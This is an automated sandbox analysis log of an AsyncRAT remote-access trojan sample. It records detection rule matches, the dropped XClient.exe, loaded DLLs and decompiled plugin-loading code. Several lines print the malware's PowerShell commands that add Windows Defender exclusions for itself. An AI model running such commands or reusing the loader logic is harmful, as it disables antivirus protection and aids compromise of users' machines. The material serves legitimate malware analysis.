                      Source: NzEsfIiAc0.exe | Binary or memory string: OriginalFilenameXClient.exe4 vs NzEsfIiAc0.exe
                      Source: NzEsfIiAc0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: NzEsfIiAc0.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: NzEsfIiAc0.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, Settings.cs | Base64 encoded string: 'hOxd/rlHdvNoRGt/znUYrVLMnalcZ1Qd1agf8L7Q678ZxLNapvp5QX2cq1fsDDBA'
                      Source: XClient.exe.0.dr, Settings.cs | Base64 encoded string: 'hOxd/rlHdvNoRGt/znUYrVLMnalcZ1Qd1agf8L7Q678ZxLNapvp5QX2cq1fsDDBA'
                      Source: XClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: XClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: NzEsfIiAc0.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: NzEsfIiAc0.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/20@2/2
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_03
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Mutant created: \Sessions\1\BaseNamedObjects\L1FeSdLNARHoL9fL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                      Source: NzEsfIiAc0.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: NzEsfIiAc0.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: NzEsfIiAc0.exe | ReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File read: C:\Users\user\Desktop\NzEsfIiAc0.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\NzEsfIiAc0.exe "C:\Users\user\Desktop\NzEsfIiAc0.exe"
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: sxs.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: mpr.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: scrrun.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: linkinfo.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ntshrui.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: cscapi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: avicap32.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: msvfw32.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Section loaded: winmm.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                      Source: XClient.lnk.0.dr | LNK file: ..\..\..\..\..\XClient.exe
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: NzEsfIiAc0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: NzEsfIiAc0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: NzEsfIiAc0.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: NzEsfIiAc0.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: XClient.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: XClient.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: NzEsfIiAc0.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
